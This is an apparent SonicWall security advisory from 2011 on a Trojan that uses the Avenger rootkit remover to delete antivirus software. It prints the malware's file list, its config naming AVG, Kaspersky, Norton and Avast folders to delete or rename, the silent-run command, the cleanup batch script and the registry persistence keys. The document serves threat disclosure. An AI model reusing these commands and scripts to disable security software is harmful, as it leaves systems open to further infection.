Trojan uses Rootkit remover tool to disable Anti-virus (Dec 1, 2011)
The Sonicwall UTM research team received reports of a new KillAV Trojan in the wild. This Trojan uses a rootkit remover tool called The Avenger. According to the home page of this tool “The Avenger is a fully-scriptable, kernel-level Windows driver designed to remove highly persistent files, registry keys/values, and other drivers protected by entrenched malware”. Ironically, the Trojan uses this anti malware tool to remove files belonging to a variety of well known anti-virus software from vendors such as AVG, Kaspersky and Symantec. Most anti-virus software protects its files from user-mode removal. However, it is very hard to protect such files from kernel-mode attacks.
The Trojan uses the following icon:
The Trojan adds the following files to the filesystem:
- C:DRIVERS10KDESCK.exe [Avenger executable]
- C:DRIVERS10TDESCK.txt [Avenger file instructions]
- C:WINDOWSsystem32eihs.txt [Avenger file instructions]
- C:DRIVERS10WINNTK.exe [Detected as GAV: KillFiles.NEK (Trojan)]
- C:cleanup.exe [Detected as GAV: Zapchast.M (Trojan)]
- C:cleanup.bat [Cleanup instructions]
- C:zip.exe [Zip utility]
- C:WINDOWSsystem32driverstsfqiza.sys [Avenger kernel-mode driver]
TDESCK.txt contains the following information:
Folders to delete:%ProgramFiles%AVG%ProgramFiles%Panda Security%ProgramFiles%ESET%ProgramFiles%KASPER~1%ProgramFiles%Avira%ProgramFiles%Softwin%ProgramFiles%Grisoft%ProgramFiles%NORTON~1%ProgramFiles%Microsoft Security ClientFiles to move:%ProgramFiles%Alwil SoftwareAvast5AvastUI.exe|%ProgramFiles%Alwil SoftwareAvast5AvastUI.exa%ProgramFiles%Alwil SoftwareAvast5AvastSvc.exe|%ProgramFiles%Alwil SoftwareAvast5AvastSvc.exa%ProgramFiles%AVAST SoftwareAvastAvastSvc.exe|%ProgramFiles%AVAST SoftwareAvastAvastSvc.exa%ProgramFiles%AVAST SoftwareAvastAvastUI.exe|%ProgramFiles%AVAST SoftwareAvastAvastUI.exaThe above information instructs the Avenger software to remove or move files and directories belonging to various anti-virus software.
Upon infection, the following command is run to remove the anti-virus files listed above in TDESCK.txt. This command runs Avenger invisibly without its GUI:
cmd /c C:DRIVERS10KDESCK.exe /nogui C:DRIVERS10TDESCK.txtcleanup.bat contains the following information:
@ECHO OFFcd %systemdrive%if exist %systemdrive%avengerbackup.zip move /y %systemdrive%avengerbackup.zip "%systemdrive%avengerbackup-%date:/=.%-%time::=.%.zip"move /y backup.reg %systemdrive%avengercopy /y avenger.txt %systemdrive%avengerfor %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:avenger attrib -r -h -s %%a:avenger* /S /D & zip -r -S -q -m -! -P infected "%systemdrive%avengerbackup.zip" %%a:avenger* -x %systemdrive%avengerbackup*.zip & rmdir %%a:avengerdel zip.exedel cleanup.exedel cleanup.batThe Trojan adds the following keys to the Windows registry to install the Avenger kernel-mode driver and run WINNTK.exe and cleanup.exe after reboot:
- HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun Microsoft Windows Debug “C:DRIVERS10WINNTK.exe”
- HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce Cleanup “C:cleanup.exe”
- HKEY_LOCAL_MACHINESystemCurrentControlSetServicesmmjnbxj ImagePath “C:WINDOWSsystem32driverstsfqiza.sys”
- HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmmjnbxj cvva “C:WINDOWSsystem32eihs.txt”
SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:
- GAV: KillFiles.NEK (Trojan)
- GAV: Zapchast.M (Trojan)
